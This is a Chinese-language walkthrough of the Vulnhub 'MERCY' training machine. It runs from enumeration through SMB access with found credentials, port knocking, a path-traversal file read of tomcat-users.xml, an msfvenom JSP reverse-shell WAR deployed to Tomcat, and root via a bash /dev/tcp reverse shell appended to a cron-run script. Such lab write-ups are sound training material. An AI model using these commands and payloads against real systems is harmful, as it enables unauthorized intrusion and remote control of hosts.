[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking+Timeclock权限提升

发布于:2024-07-23 ⋅ 阅读:(184) ⋅ 点赞:(0)

信息收集

IP Address Opening Ports
192.168.101.151 TCP:80,22,53, 110, 139, 143, 445, 993, 995, 8080

$ $ nmap -p- 192.168.101.151 --min-rate 1000 -sC -sV

PORT     STATE SERVICE     VERSION
53/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: UIDL TOP STLS AUTH-RESP-CODE RESP-CODES PIPELINING SASL CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: LITERAL+ IDLE SASL-IR more listed IMAP4rev1 OK LOGIN-REFERRALS capabilities ENABLE LOGINDISABLEDA0001 STARTTLS post-login have Pre-login ID
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ IDLE more listed IMAP4rev1 SASL-IR LOGIN-REFERRALS AUTH=PLAINA0001 OK capabilities ENABLE post-login have Pre-login ID
995/tcp  open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_pop3-capabilities: UIDL TOP PIPELINING AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) CAPA
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests

本地权限

http://192.168.101.151:8080/robots.txt

image.png

$ echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg=='|base64 -d

image-1.png

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

$ enum4linux 192.168.101.151

image-2.png

pleadformercy
qiu
thisisasuperduperlonguser
fluffy

image-3.png

username:qiu
password:password

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password'

image-4.png

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password' -s qiu -r --depth 10

image-5.png

$ smbclient //192.168.101.151/qiu -U qiu

image-6.png

smb: \> lcd ./dev
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

image-7.png

$ cat .private/opensesame/config

image-8.png

通过端口敲门开放SSH和HTTP端口

http:159,27391,4
ssh:17301,28504,9999

$ knock 192.168.101.151 17301 28504 9999 -d 300 -v

$ knock 192.168.101.151 159 27391 4 -d 300 -v

image-9.png

image-10.png

$ dirb http://192.168.101.151/

http://192.168.101.151/robots.txt

image-11.png

http://192.168.101.151/nomercy/

image-12.png

http://192.168.101.151/mercy/

image-13.png

image-14.png

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../etc/passwd

image-15.png

$ whatweb http://192.168.101.151:8080 -v

image-16.png

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

image-17.png

username:fluffy
password:freakishfluffybunny

username:thisisasuperduperlonguser
password:heartbreakisinevitable

http://192.168.101.151:8080/manager/html

image-19.png

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.128 LPORT=10032 -f war >reverse.war

image-20.png

http://192.168.101.151:8080/reverse/

image-21.png

Local.txt 截屏

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Local.txt 内容

Plz have mercy on me! 😦 😦

权限提升

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat7@MERCY:/var/lib/tomcat7$ su fluffy

image-22.png

$ ls -la /home/fluffy/.private/secrets

image-23.png

$ ./pspy32

image-24.png

$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'">>/home/fluffy/.private/secrets/timeclock

image-25.png

Proof.txt 截屏

image-26.png

Proof.txt 内容

Congratulations on rooting MERCY. 😃

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布